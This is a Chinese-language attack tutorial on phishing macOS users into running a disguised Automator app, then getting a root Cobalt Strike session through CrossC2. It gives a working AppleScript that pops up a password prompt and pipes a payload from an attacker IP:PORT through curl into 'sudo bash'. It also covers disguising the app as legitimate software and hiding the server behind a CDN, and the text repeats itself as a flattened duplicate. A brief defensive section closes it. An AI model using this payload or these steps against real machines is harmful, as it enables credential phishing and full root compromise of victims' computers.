MAC钓鱼并Root权限上线CS并权限维持,以及所有的坑如何解决
字数 1022 2025-08-11 21:26:12

MAC钓鱼攻击与Root权限维持技术详解

一、工具准备

1. CrossC2下载与配置

  • 下载地址: https://github.com/gloxec/CrossC2/releases/tag/v3.1.0
  • 根据CS客户端操作系统选择对应版本
  • 同时下载插件: CorssC2-githubBot-2022-06-07.cna

2. 插件配置

  1. 使用文本编辑器打开CorssC2-githubBot-2022-06-07.cna
  2. 修改红色框出的部分,填入CrossC2可执行文件的绝对路径
    • Linux/Mac版本需先执行chmod +x添加执行权限
  3. 在CS中添加配置好的插件

注意事项:

  • 必须使用HTTPS监听器
  • 需要将CS服务端的.cobaltstrike.beacon_keys文件复制到客户端

二、木马生成与使用

1. 生成过程

  1. 在CrossC2界面中:

    • 指定.cobaltstrike.beacon_keys文件路径
    • 设置ProcessName(木马在主机上的进程名)
    • 点击Build按钮

  2. 生成结果:

    • CS日志中会显示一个curl命令
    • 在目标机上执行此命令即可上线

2. Mac Root权限木马制作

工具准备

  • Automator.app (Mac自带自动化工具)

制作步骤

  1. 打开Automator.app
  2. 选择"运行Applescript"模板
  3. 使用以下恶意脚本:
set unixDesktopPath to POSIX path of "/System/Library/User Template/"
set quotedUnixDesktopPath to quoted form of unixDesktopPath
set fromUnix to do shell script " curl -A O -o- -L http://IP:PORT/a |sudo bash -s " & quotedUnixDesktopPath with administrator privileges
end run

脚本说明:

  • 通过curl从攻击者服务器下载恶意脚本
  • 使用sudo bash -s以root权限执行
  • 会弹出密码输入框进行钓鱼

保存与使用

  1. 保存为.app应用程序
  2. 诱骗目标用户点击执行
  3. 当用户输入密码后,CS将获得root权限会话

三、关键注意事项

  1. 监听器配置:

    • 必须使用HTTPS监听器
    • 确保端口开放且可访问

  2. 文件权限:

    • CrossC2可执行文件需要添加执行权限
    • .cobaltstrike.beacon_keys文件必须正确配置

  3. 钓鱼技巧:

    • 可以自定义密码输入框的提示文本
    • 木马app图标和名称可伪装成合法应用

  4. 网络配置:

    • 确保攻击服务器IP和端口正确
    • 考虑使用域名和CDN隐藏真实IP

四、防御建议

  1. 用户教育:

    • 不要随意输入密码
    • 警惕未知来源的应用程序

  2. 系统防护:

    • 启用Gatekeeper
    • 限制sudo权限
    • 监控异常网络连接

  3. 企业防护:

    • 部署EDR解决方案
    • 实施应用程序白名单
    • 监控特权升级行为

注: 权限维持技术将在后续文档中详细介绍。

MAC钓鱼攻击与Root权限维持技术详解 一、工具准备 1. CrossC2下载与配置 下载地址: https://github.com/gloxec/CrossC2/releases/tag/v3.1.0 根据CS客户端操作系统选择对应版本 同时下载插件: CorssC2-githubBot-2022-06-07.cna 2. 插件配置 使用文本编辑器打开 CorssC2-githubBot-2022-06-07.cna 修改红色框出的部分,填入CrossC2可执行文件的绝对路径 Linux/Mac版本需先执行 chmod +x 添加执行权限 在CS中添加配置好的插件 注意事项 : 必须使用HTTPS监听器 需要将CS服务端的 .cobaltstrike.beacon_keys 文件复制到客户端 二、木马生成与使用 1. 生成过程 在CrossC2界面中: 指定 .cobaltstrike.beacon_keys 文件路径 设置ProcessName(木马在主机上的进程名) 点击Build按钮 生成结果: CS日志中会显示一个curl命令 在目标机上执行此命令即可上线 2. Mac Root权限木马制作 工具准备 Automator.app (Mac自带自动化工具) 制作步骤 打开Automator.app 选择"运行Applescript"模板 使用以下恶意脚本: 脚本说明 : 通过curl从攻击者服务器下载恶意脚本 使用 sudo bash -s 以root权限执行 会弹出密码输入框进行钓鱼 保存与使用 保存为.app应用程序 诱骗目标用户点击执行 当用户输入密码后,CS将获得root权限会话 三、关键注意事项 监听器配置: 必须使用HTTPS监听器 确保端口开放且可访问 文件权限: CrossC2可执行文件需要添加执行权限 .cobaltstrike.beacon_keys 文件必须正确配置 钓鱼技巧: 可以自定义密码输入框的提示文本 木马app图标和名称可伪装成合法应用 网络配置: 确保攻击服务器IP和端口正确 考虑使用域名和CDN隐藏真实IP 四、防御建议 用户教育: 不要随意输入密码 警惕未知来源的应用程序 系统防护: 启用Gatekeeper 限制sudo权限 监控异常网络连接 企业防护: 部署EDR解决方案 实施应用程序白名单 监控特权升级行为 注: 权限维持技术将在后续文档中详细介绍。